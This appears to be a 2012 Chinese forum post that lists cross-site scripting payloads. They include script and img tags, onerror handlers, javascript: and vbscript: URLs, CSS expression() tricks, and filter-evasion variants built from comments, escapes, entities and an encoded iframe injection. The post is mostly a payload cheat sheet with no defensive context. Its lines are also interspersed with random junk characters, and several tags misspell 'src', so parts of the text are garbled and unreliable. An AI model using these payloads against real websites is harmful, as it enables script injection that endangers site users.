<script>alert("跨站")</script> (最常用)4 ^ z$ W' k" g4 W3 |2 @( o
<img scr=javascript:alert("跨站")></img>3 R# H; ]' m" d" `
<img scr="javascript: alert(/跨站/)></img>
B2 [. p9 P2 q. ~% K<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格), G, d% g( _0 u7 k3 w4 q+ ]8 q$ ~
<img scr="#" onerror=alert(/跨站/)></img>7 h) q$ O) {) `& S
<img scr="#" style="xss:expression(alert(/xss/));"></img>9 {" {& {( \7 W9 j# f5 W k2 D
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
0 u1 }! N5 Y @: m+ z<img src=vbscript:msgbox ("xss")></img>! u2 t5 ]+ L/ o/ A! F3 Z
<style> input {left:expression (alert('xss'))}</style>0 N# L: ^1 U$ e, q; E& m3 { k
<div style={left:expression (alert('xss'))}></div>) N7 a$ F& F+ `8 f% i; d2 {
<div style={left:exp/* */ression (alert('xss'))}></div>
! l& O3 i8 B( {$ ^. p' ^; v8 @<div style={left:\0065\0078ression (alert('xss'))}></div>
o# a5 g* u8 m& F9 bhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
O2 y" g- Q. kunicode <div style="{left:expRessioN (alert('xss'))}">
: m2 a6 {0 g# s, A- y: [7 e$ M9 U& K
$ w1 s0 W, s; Z' W* O0 T$ U M, }"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
, R( r7 m$ o0 W: q |
发表于 2012-9-15 14:09:13
收藏
分享
支持
反对